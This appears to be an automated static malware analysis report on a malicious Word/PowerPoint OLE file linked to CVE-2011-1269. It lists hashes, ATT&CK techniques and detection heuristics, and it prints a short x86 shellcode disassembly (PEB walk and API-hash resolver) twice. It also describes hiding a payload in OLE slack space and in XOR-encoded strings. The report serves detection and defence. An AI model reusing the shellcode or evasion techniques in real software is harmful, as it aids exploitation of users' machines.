Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a1fddf8028d7022e…

MALICIOUS

Office (OLE)

125.5 KB Created: 2006-01-25 08:30:00 Authoring application: Microsoft Office Word First seen: 2014-03-27
MD5: d53019c7ff0329533b93aef092826a54 SHA-1: 7e76a488dcc165a7078f279a1fa845fb478ec776 SHA-256: a1fddf8028d7022e34b6e42aae466761b7b2e9e461f04fc4049733b45d72c64a
360 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The sample is an OLE file containing raw shellcode and exhibits characteristics of memory corruption exploits, specifically referencing CVE-2011-1269 / MS11-036. The presence of a NOP sled, PEB access, and XOR-encoded strings further indicates malicious intent to execute arbitrary code. The large slack space in the OLE structure is also a common evasion technique for embedding shellcode.

Heuristics 8

  • PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family critical CVE likely PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD
    A macro-free binary PowerPoint (.ppt) document carries a native code payload (embedded PE and/or process-injection shellcode), staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556).
  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • XOR-encoded strings (key 0xFF) critical SC_XOR_ENCODED
    Found 8 Windows library/API name(s) XOR-encoded with single-byte key 0xFF: 'KERNEL32.DLL', 'iphlpapi.dll', 'LoadLibraryA', 'GetProcAddress', 'ExitProcess', 'CreateFileA', 'OpenProcess', 'ShellExecuteA'
    Disassembly hidden — these bytes score as data, not coherent x86 code (no internal branches to corroborate control flow).
  • NOP sled detected high SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly hidden — these bytes score as data, not coherent x86 code (3/4 branch targets land on an instruction boundary (75% coherence)).
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: uncertain (0.675) — 3/6 branch targets land on an instruction boundary (50% coherence)
    00000B59  64a130000000      mov eax, dword ptr fs:[0x30]
00000B5F  8b400c            mov eax, dword ptr [eax + 0xc]
00000B62  8b701c            mov esi, dword ptr [eax + 0x1c]
00000B65  ad                lodsd eax, dword ptr [esi]
00000B66  8b7008            mov esi, dword ptr [eax + 8]
00000B69  81ec00070000      sub esp, 0x700
00000B6F  8bec              mov ebp, esp
00000B71  e912010000        jmp 0xc88
00000B76  5b                pop ebx
00000B77  33c9              xor ecx, ecx
00000B79  b10c              mov cl, 0xc
00000B7B  56                push esi
00000B7C  ff33              push dword ptr [ebx]
00000B7E  e8a3000000        call 0xc26
00000B83  89448d00          mov dword ptr [ebp + ecx*4], eax
00000B87  83ebfc            sub ebx, -4
00000B8A  e2ef              loop 0xb7b
00000B8C  33f6              xor esi, esi
00000B8E  bfe8170100        mov edi, 0x117e8
00000B93  c7455408de0000    mov dword ptr [ebp + 0x54], 0xde08
00000B9A  037d54            add edi, dword ptr [ebp + 0x54]
00000B9D  897558            mov dword ptr [ebp + 0x58], esi
00000BA0  83455804          add dword ptr [ebp + 0x58], 4
00000BA4  56                push esi
00000BA5  ff7558            push dword ptr [ebp + 0x58]
00000BA8  ff552c            call dword ptr [ebp + 0x2c]
00000BAB  3bc7              cmp eax, edi
00000BAD  740b              je 0xbba
00000BAF  817d5800000100    cmp dword ptr [ebp + 0x58], 0x10000
00000BB6  7432              je 0xbea
00000BB8  eb                .byte 0xeb
  • PEB API-hash resolver high SC_API_HASH_RESOLVER
    PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
    Disassembly
    x86 disassembly · validity: uncertain (0.675) — 3/6 branch targets land on an instruction boundary (50% coherence)
    00000B59  64a130000000      mov eax, dword ptr fs:[0x30]
00000B5F  8b400c            mov eax, dword ptr [eax + 0xc]
00000B62  8b701c            mov esi, dword ptr [eax + 0x1c]
00000B65  ad                lodsd eax, dword ptr [esi]
00000B66  8b7008            mov esi, dword ptr [eax + 8]
00000B69  81ec00070000      sub esp, 0x700
00000B6F  8bec              mov ebp, esp
00000B71  e912010000        jmp 0xc88
00000B76  5b                pop ebx
00000B77  33c9              xor ecx, ecx
00000B79  b10c              mov cl, 0xc
00000B7B  56                push esi
00000B7C  ff33              push dword ptr [ebx]
00000B7E  e8a3000000        call 0xc26
00000B83  89448d00          mov dword ptr [ebp + ecx*4], eax
00000B87  83ebfc            sub ebx, -4
00000B8A  e2ef              loop 0xb7b
00000B8C  33f6              xor esi, esi
00000B8E  bfe8170100        mov edi, 0x117e8
00000B93  c7455408de0000    mov dword ptr [ebp + 0x54], 0xde08
00000B9A  037d54            add edi, dword ptr [ebp + 0x54]
00000B9D  897558            mov dword ptr [ebp + 0x58], esi
00000BA0  83455804          add dword ptr [ebp + 0x58], 4
00000BA4  56                push esi
00000BA5  ff7558            push dword ptr [ebp + 0x58]
00000BA8  ff552c            call dword ptr [ebp + 0x2c]
00000BAB  3bc7              cmp eax, edi
00000BAD  740b              je 0xbba
00000BAF  817d5800000100    cmp dword ptr [ebp + 0x58], 0x10000
00000BB6  7432              je 0xbea
00000BB8  eb                .byte 0xeb
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 128,496 bytes but its declared streams total only 61,092 bytes — 67,404 bytes (52%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • OLE file contains raw shellcode-like resolver payload high OLE_RAW_SHELLCODE_PAYLOAD
    Malformed or legacy OLE file contains raw PEB/API-resolver shellcode bytes at the file level, including loader-walk instructions and a nearby payload marker. This indicates an exploit payload carrier but does not identify a specific parser CVE.

Open this report in the interactive analyzer, or submit your own file for analysis.